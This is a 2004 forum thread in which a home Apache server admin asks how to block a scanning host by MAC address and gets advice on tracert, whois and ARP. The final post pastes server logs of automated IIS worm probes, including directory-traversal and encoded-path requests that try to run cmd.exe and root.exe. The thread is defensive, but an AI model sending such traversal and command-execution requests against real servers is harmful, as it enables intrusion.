Please report all spam threads, posts and suspicious members. We receive spam notifications and will take immediate action!
Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: finding out the MAC address through IP




  1. #1
    Join Date
    Sep 2002
    Posts
    1,636

    Default

    I have an issue with someone that keeps trying to hack me. I know their IP, it keeps comming up in Apache's logs all the time. But my router doesnt have IP block, only MAC address block. So how would I find some1 elses MAC address through use of IP.
    BTW i tried pinging the IP, with no luck, Request timed out - error. I was thinking of a sniffer, but that would just give me the address of the router, rite?
    any help here would be appricieated.[/list]

  2. #2
    Join Date
    Dec 2002
    Posts
    4,246

    Default

    i don't know about the MAC address, but you can at least trace the IP back to the ISP, then file a complaint with them. try using the tracert <IP> command from the command line

    EDIT: you could also try a whois lookup at arin.net. while it wont give you a MAC address it will give you some detailed information about the provider
    I've gone too far and need to move on!

  3. #3
    Join Date
    Dec 2002
    Location
    caves of bedrock
    Posts
    3,129

    Default

    http://www.youngzsoft.net/cc-get-mac-address/
    ^ that tool will let you find MAC from IP but i don't think you will be successful untill you actually connect to the machine by way of ping or something like that but you can still try. since this person is sending "time out" while pinging then looks like he/she is running a firewall.
    http://www.uwhois.com/
    ^ that is another site similar to what minibubba suggested.
    Latest Microsoft Security Updates.
    Last Updated:
    10th MARCH


    If you are a security freak: Use Microsoft Baseline Security Analyzer (NT/2000/XP/2003)
    ======================
    icq : 203189004
    jabber : asklepios20@jabber.org
    =======================
    Linux user since: April 24, 2003 312478
    yabaa dabaa doo...
    Customized for 1024x768

  4. #4
    Join Date
    Nov 2001
    Posts
    1,599

    Default

    Quote Originally Posted by kane2g
    But my router doesnt have IP block, only MAC address block.[/list]
    Your router can only block MAC addresses that are connected Through it.
    "In their capacity as a tool, computers will be but a ripple on the surface of our culture. In their capacity as intellectual challenge, they are without precedent in the cultural history of mankind." - Edsger Dijkstra

  5. #5
    Join Date
    Sep 2002
    Posts
    1,636

    Default

    yeah, i figured that out :oops:
    but as I am thinking of using something like www.smoothwall.org for my fireewall, rather than the router.
    guess the banning IPs will have to do.

  6. #6
    Join Date
    Nov 2001
    Posts
    1,599

    Default

    What do you mean, "will have to do" ? Hehe.... It's a flawless system.... 8)
    "In their capacity as a tool, computers will be but a ripple on the surface of our culture. In their capacity as intellectual challenge, they are without precedent in the cultural history of mankind." - Edsger Dijkstra

  7. #7
    Join Date
    Sep 2002
    Posts
    1,636

    Default

    Well, just checking the logs everyday and making sure someone didnt just get a fresh IP. Banning a MAC would make it a lot easier. But oh-well. Tis a job of a admin I guess :wink:

  8. #8
    Join Date
    Nov 2001
    Location
    The Land of OZ!
    Posts
    674

    Default

    hmm: if you can make a connection of some sort to the machine you should be able to query the physical address [MAC address] with the ARP command like so.

    ARP- A a.b.c.d

    where a.b.c.d is the ip address..

  9. #9
    Beefy Guest

    Default

    I just thought of something. How are they trying to hack you?

  10. #10
    Join Date
    Sep 2002
    Posts
    1,636

    Default

    this is apache's access log


    24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:42 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:43 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:43 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:43 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:44 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:44 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 296
    24.17.227.36 - - [19/Mar/2004:02:25:45 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489
    24.17.227.36 - - [19/Mar/2004:02:25:46 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 489



    here is error log

    [Thu Mar 18 23:57:44 2004] [error] [client 67.167.106.111] File does not exist: C:/Apache2/htdocs/default.ida
    [Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
    [Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/MSADC
    [Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/c
    [Fri Mar 19 02:25:42 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/d
    [Fri Mar 19 02:25:43 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
    [Fri Mar 19 02:25:43 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/_vti_bin
    [Fri Mar 19 02:25:43 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/_mem_bin
    [Fri Mar 19 02:25:44 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/msadc
    [Fri Mar 19 02:25:44 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
    [Fri Mar 19 02:25:45 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
    [Fri Mar 19 02:25:45 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
    [Fri Mar 19 02:25:45 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
    [Fri Mar 19 02:25:46 2004] [error] [client 24.17.227.36] File does not exist: C:/Apache2/htdocs/scripts
    [Fri Mar 19 05:27:42 2004] [error] [client 67.167.106.111] File does not exist: C:/Apache2/htdocs/default.ida

    i get simillar errors from following IPs.
    67.163.226.215
    67.167.106.39
    67.167.115.119
    67.168.94.16
    67.113.192.182
    67.166.183.64
    129.25.34.226
    67.163.240.32
    24.17.227.36

    Whois tells me that most of them 67.x.x.x are Comcast :(

Page 1 of 2 12 LastLast

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •